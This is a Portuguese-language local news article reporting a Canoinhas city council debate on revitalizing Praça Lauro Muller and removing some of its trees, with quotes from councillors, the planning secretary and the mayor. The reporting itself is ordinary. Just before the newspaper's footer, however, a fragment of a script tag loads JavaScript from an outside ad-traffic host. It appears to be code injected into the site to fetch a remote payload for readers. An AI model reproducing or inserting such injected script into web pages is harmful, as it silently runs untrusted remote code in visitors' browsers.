InícioDestaqueProjeto de Revitalização da Praça, "Seria interessante algumas pessoas participarem mais das...

Projeto de Revitalização da Praça, “Seria interessante algumas pessoas participarem mais das discussões antes de criticar”.

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

Projeto tem estudo técnico e respeita as leis ambientais

Entrou em debate na sessão desta segunda, 24, tema sobre a revitalização da Praça Lauro Muller. O assunto teve bastante repercussão nos últimos dias pelas redes sociais, com diversos questionamentos da população.

 

 

O presidente da casa, vereador coronel Mario Erzinger (PR) usou a tribuna para esclarecer a população alguns pontos sobre o andamento do projeto, e sobre o corte de árvores na praça. Conforme amplamente divulgado pela imprensa em 2017, o projeto de revitalização deste histórico espaço público foi realizado numa parceria entre a Uniuv e a equipe da secretaria de Planejamento, por arquitetos e urbanistas, além de estudantes do curso, que são de Canoinhas.

 

 

O resultado de tudo foi avaliado em audiência pública realizada na Câmara de Vereadores no dia 6 de dezembro de 2017. “Portanto, o projeto de revitalização, além de ser algo extremamente técnico também foi amplamente discutido como todas as decisões importantes tomadas pelo poder público”, ressalta o presidente.

 

 

Erzinger ainda destacou que a procuradoria do município deixou a disposição da Câmara e da comunidade, cópia do projeto da revitalização com todas as informações e cuidados que foram tomados para a revitalização da praça.

 

 

“São mais de 370 árvores na praça, e existem algumas, conforme estudo técnico, que tem a necessidade da supressão”, explicou. Vereador também ressaltou que é contra o corte de qualquer tipo de árvores, mas concluiu: “quando há um estudo técnico, estudado, embasado cientificamente, não podemos questionar se a árvore pode ou não ser cortada, é uma questão também de segurança”. O presidente continuou sua explicação, ressaltando que as árvores que serão suprimidas na praça serão as exóticas, e não as nativas, até porque a legislação não permite.

 

 

“Aproveitando esse momento também estou solicitando a secretaria do meio ambiente informações sobre um plano de arborização para o município, que está sendo elaborado, pois este projeto é de extrema importância para uma cidade que acabou de completar seus 107 anos”, concluiu.

 

 

Telma Bley (MDB) em sua fala ainda frisou que “o poder executivo e legislativo jamais iria aprovar algo que não fosse bom para a comunidade e para natureza, e principalmente mexer com nossas belas praças. Temos estudos técnicos e um trabalho a ser feito para o melhor da nossa cidade”.

 

 

Em seguida Wilmar Sudoski (PSD) contribuiu com o debate explicando que os alunos da Uniuv realizaram um trabalho minucioso, e que além de técnico, também fizeram uma enquete com aproximadamente 700 pessoas sobre as necessidades de melhorias na praça. “Esse trabalho está com a universidade, e foi feito também um levantamento com os usuários das praças, para saber o que as pessoas buscam de melhorias nesses espaços”. Sudoski ainda destacou que a revitalização busca, entre tantas melhorias, deixar um ambiente mais claro, organizado para as famílias e pessoas de bem poderem circular durante qualquer horário do dia, evitando assim vandalismo, uso de drogas entre outras ações negativas que vinham acontecendo no espaço.

 

 

Chico Mineiro (PR) falou sobre a necessidade da retirada das árvores com problemas: “o estudo técnico justifica essa ação, e isso foi explicado em audiência pública pela universidade. Seria interessante algumas pessoas participarem mais das discussões antes de criticar”.

 

 

Paulo Glinski (PSD) lembrou que o projeto de revitalização pode ser discutido e até proposto alterações técnicas viáveis, “mas as pessoas tem que conhecer o projeto, para que possam opinar sobre o mesmo”.

 

 

Glinski ainda exemplificou um problema bem sério, que são pessoas que utilizam as redes sociais para atacar outras, ou pior ainda, usam perfis fakes realizando denúncias caluniosas, e que geram discussões enormes, prejudicando as boas ações no município. “As críticas de pessoas fakes só se criam porque pessoas de bem se deixam levar muitas vezes pela emoção. É preciso analisar muito bem antes para não se cometer injustiças”, finalizou.

 

 

Presidente da Câmara se posicionou sobre o projeto: “O projeto visa a sustentabilidade, harmonizando atrações de esporte, cultura e lazer. Os espaços de convivência foram valorizados, ressaltando o costume local das rodas de chimarrão. A arborização, um dos aspectos mais elogiados das praças, é valorizada pelo posicionamento das quadras esportivas, palco para apresentações culturais e uma espécie de chimarródromo”, explica vereador Coronel Mario Erzinger.

Sobre a revitalização

Secretário de Planejamento do município, Rafael Rottili Roeder explica que o trabalho demorou meses para ser concluído e contou com estudos técnicos, pesquisa histórica e in loco, com usuários da Praça. Consulta pública na internet ouviu a população sobre as reais necessidades da utilização do ambiente também.

 

 “Nunca, na história do município, houve tanta participação popular quando o assunto é o planejamento da nossa querida cidade. Nós amamos e respeitamos Canoinhas, e por isso as nossas decisões são sempre democráticas”, destaca o prefeito Beto Passos.

 

Neste processo previu-se a retirada de árvores para trazer mais acessibilidade. Além disso, a reurbanização manterá o traçado original para impactar o mínimo possível as árvores existentes. As espécies que serão retiradas darão lugares a bancos, área para apresentações culturais, ampliação de playground infantil e espaço para esporte. Durante avaliação das árvores, realizada por engenheiros ambiental e agrônomo, verificou-se que há espécies doentes, outras mortas, outras que danificam os passeios, espécies invasoras, há ainda as árvores que danificam os passeios. Além disso, a supressão tem a autorização dos órgãos ambientais.

 

Portanto, a supressão da vegetação está baseada em critérios técnicos, de sociabilidade e de melhor utilização do espaço público respeitando estudos e a participação da população. As secretarias municipais de Planejamento e Meio Ambiente também se disponibilizam para qualquer esclarecimento adicional.

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.